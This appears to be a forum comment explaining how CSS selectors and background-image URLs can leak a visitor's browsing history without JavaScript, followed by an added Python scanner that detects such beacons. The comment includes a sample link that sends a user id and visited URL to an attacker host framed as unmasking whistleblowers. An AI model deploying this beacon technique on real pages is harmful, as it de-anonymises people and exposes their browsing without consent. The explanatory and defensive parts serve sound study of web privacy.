by reneberlin
3605 days ago
You would use background-images for the links - they will trigger the parametrized GET to the server. Present browsers only load the image if it is visible and not hidden ("display:none"). They can be transparent 1px - they just need to be turned visible one by one if a selector fits. For example: you'd hide every link, except the one that should trigger a GET to the attacker's server to leave the information there. Easy - and with cascaded :NOT and ~ selectors you can accomplish this at scale. The links would look something like this:

<a href="https://secretsiteone.com/whistleblower/form" style="background-image: url(//uncloakwhistleblowers.com/img/transp.gif?checkeduser=id12345&vistedurl=secretsiteone.com%2Fwhistleblower%2Fform)">

A while back I demonstrated that a website without JS can trigger GET-requests BY HOVERING A LINK. My coworkers didn't believe me - they were wrong.

Caveats: When caching is enabled this attack will trigger just once - but that is enough in that case. I found the codepen that I had made back then: http://codepen.io/teamgroove/pen/mIxfg

USE LYNX: Turns out one shouldn't just turn off JS - but images also. Maybe then better use lynx as a browser (with all cookie stuff deactivated and behind a tor-proxy or better: proxy-chains) if concerned about privacy. Even that will NOT be "secure enough" - of course - it just wouldn't expose your browsing history in the first place - which was the topic.
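For anyone auditing markup for the pattern described in the comment above, here is an added example (not part of the original comment) of a static check that flags CSS `url()` references, in inline `style` attributes and `<style>` blocks, that load from another host and carry a query string. The names `CssBeaconScanner` and `scan` and the hosts `site.example` and `tracker.example` are assumptions made up for this sketch, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)", re.I)  # CSS url(...)

class CssBeaconScanner(HTMLParser):
    # Collects CSS url() references that hit a foreign host with a query string.
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname
        self.in_style = False
        self.findings = []  # list of (where, absolute_url)

    def _check(self, css, where):
        for ref in CSS_URL.findall(css):
            absolute = urljoin(self.page_url, ref)  # resolves //host and /path forms
            parts = urlsplit(absolute)
            if parts.hostname and parts.hostname != self.page_host and parts.query:
                self.findings.append((where, absolute))

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self.in_style = True
        style = dict(attrs).get("style")
        if style:
            self._check(style, f"<{tag} style>")

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style:
            self._check(data, "<style> block")

def scan(html, page_url):
    scanner = CssBeaconScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page; every host and parameter here is a placeholder.
SAMPLE = """
<style>a.x:hover { background-image: url("https://tracker.example/t.gif?u=id1&k=a") }
a.y { background: url(/img/local.png?v=2) }</style>
<a href="/b" style="background-image: url(//tracker.example/t.gif?u=id1&k=b)">b</a>
"""
```

This only covers CSS embedded in the page, not external stylesheets; in the browser, a `Content-Security-Policy` with a restrictive `img-src` blocks such background-image loads regardless of which selector triggers them.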